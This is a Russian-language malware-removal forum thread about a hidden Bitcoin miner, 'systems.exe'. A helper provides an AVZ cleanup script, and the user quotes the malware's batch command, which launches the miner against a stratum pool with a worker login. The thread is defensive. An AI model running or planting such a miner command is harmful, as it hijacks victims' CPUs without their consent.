Показано с 1 по 9 из 9.

Процесс Systems.exe нагружает процессор на 100%. [not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ] (заявка № 180900)

  1. #1
    Junior Member Репутация
    Регистрация
    31.03.2015
    Сообщений
    7
    Вес репутации
    7

    Thumbs up Процесс Systems.exe нагружает процессор на 100%. [not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ]

    Здравствуйте.
    Столкнулся сегодня с одной странностью. Дело в том, что на моем рабочем столе находится виджет индикатора ЦП и Оперативной памяти (стандартный от Win 7). И сегодня я заметил, что ЦП по непонятным причинам был нагружен полностью, до 100%.
    Зашел в диспетчер задач, отсортировав процессы по "нагруженности", увидел, что 95-99% процессора использует файл "systems.exe" (именно systems, а не system), появившийся не понятно откуда. Открыл место хранения файла (C:\Users\Саша\AppData\Local\svchost\miner) и вижу, что файлик появился совсем недавно (на тот момент как я это заметил, с момента создания прошло 8-10 минут). Полез в гугл и нашел подобные проблемы (bitcoin-miner), но именно такой как у меня не увидел. У людей, насколько я понял процесс называется по разному. Или "explorer.exe", или "svchost.exe" и т.д. Насторожило то, что у кого то начали шифроваться файлы. После этого я этот процесс убил.
    Зашел на вирустотал и, как и ожидалось, файл оказался вирусом (34 из 57 антивирусов увидели в нем вирус). А мой от Microsoft (Essentials) ничего криминального не увидел.
    Подскажите, как быть. Компьютер не перезагружал и файлики эти пока еще не удалил.
    Вложения Вложения
    Последний раз редактировалось raz0812; 31.03.2015 в 19:11.

  2. Реклама
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,268
    Вес репутации
    325
    Уважаемый(ая) raz0812, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Странствующий хэлпер Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    90,437
    Вес репутации
    2913
    Выполните скрипт в AVZ
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\Users\Саша\AppData\Local\svchost\services.exe','');
     DeleteFile('C:\Users\Саша\AppData\Local\svchost\services.exe','32');
     RegKeyParamDel('HKEY_CURRENT_USER','Software\Microsoft\Windows\CurrentVersion\Run','svchost');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(false);
    end.
    Компьютер перезагрузится.

    Пришлите карантин согласно Приложения 2 правил по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

    Сделайте новые логи по правилам
    Microsoft MVP 2012, 2013, 2014, 2015, 2016 Consumer Security

  5. thyrex получил(а) благодарность за это сообщение от


  6. #4
    Junior Member Репутация
    Регистрация
    31.03.2015
    Сообщений
    7
    Вес репутации
    7

    .

    Сделал. Процесс не появился после перезагрузки. И на карантине файла services.exe нету. Ошибка какая-то проскочила при выполнении скрипта. Высылаю логи.

    upd: Как я понял на карантине и не появится этот файл, потому что его и нет совсем. Есть только такие:

    C:\Users\Саша\AppData\Local\svchost\miner\libcurl-4.dll
    libwinpthread-1.dll
    start.bat
    systems.exe
    zlib1.dll

    и сам архив, из которого все это и разархивировалось C:\Users\Саша\AppData\Local\svchost\ciner.zip

    Могу отправить экзешник systems, если нужно.
    Содержимое батника кстати очень интересное:

    systems --algo=scrypt --url=stratum+tcp://stratum.khore.org:3336 --userpass=alex0097.1:x
    Вложения Вложения
    Последний раз редактировалось raz0812; 31.03.2015 в 21:08.

  7. #5
    Странствующий хэлпер Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    90,437
    Вес репутации
    2913
    Всю папку
    Цитата Сообщение от raz0812 Посмотреть сообщение
    C:\Users\Саша\AppData\Local\svchost
    заархивируйте с паролем virus и пришлите по красной ссылке Прислать запрошенный карантин над первым сообщением темы.

    Затем эту папку удалите
    Microsoft MVP 2012, 2013, 2014, 2015, 2016 Consumer Security

  8. thyrex получил(а) благодарность за это сообщение от


  9. #6
    Junior Member Репутация
    Регистрация
    31.03.2015
    Сообщений
    7
    Вес репутации
    7
    Готово.

  10. #7
    Странствующий хэлпер Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    90,437
    Вес репутации
    2913
    Что с проблемой после удаления папки?
    Microsoft MVP 2012, 2013, 2014, 2015, 2016 Consumer Security

  11. thyrex получил(а) благодарность за это сообщение от


  12. #8
    Junior Member Репутация
    Регистрация
    31.03.2015
    Сообщений
    7
    Вес репутации
    7
    Все нормально, проблем больше не возникало! Только вот одного понять не могу, где я его таки хапнул... Большое спасибо Вам!

  13. #9
    Cybernetic Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    29.12.2008
    Сообщений
    47,506
    Вес репутации
    940

    Итог лечения

    Статистика проведенного лечения:
    • Получено карантинов: 1
    • Обработано файлов: 5
    • В ходе лечения обнаружены вредоносные программы:
      1. \miner\systems.exe - not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ( DrWEB: Tool.BtcMine.433, BitDefender: Application.BitCoinMiner.FP )


  • Уважаемый(ая) raz0812, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:


    Надеемся больше никогда не увидеть ваш компьютер зараженным!

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
  • Присоединяйтесь к нам в соцсетях!

    Мы делаем все возможное, чтобы помогать людям в защите и лечении компьютеров.

    Похожие темы

    1. Карантин 2B17FC97BB8110F374588048ED391278 [not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ]
      От CyberHelper в разделе VirusDetector - Бесплатный онлайн-сервис проверки компьютера
      Ответов: 1
      Последнее сообщение: 25.07.2014, 16:07
    2. Ответов: 12
      Последнее сообщение: 30.01.2014, 17:25
    3. Ответов: 8
      Последнее сообщение: 21.01.2014, 13:09
    4. Вирус загружает весь ЦП на 100%. [not-a-virus:HEUR:RiskTool.Win32.BitCoinMiner.heur ]
      От Александр Малахов в разделе Помогите!
      Ответов: 18
      Последнее сообщение: 14.01.2014, 06:49
    5. Ответов: 8
      Последнее сообщение: 12.01.2014, 12:05

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01193 seconds with 22 queries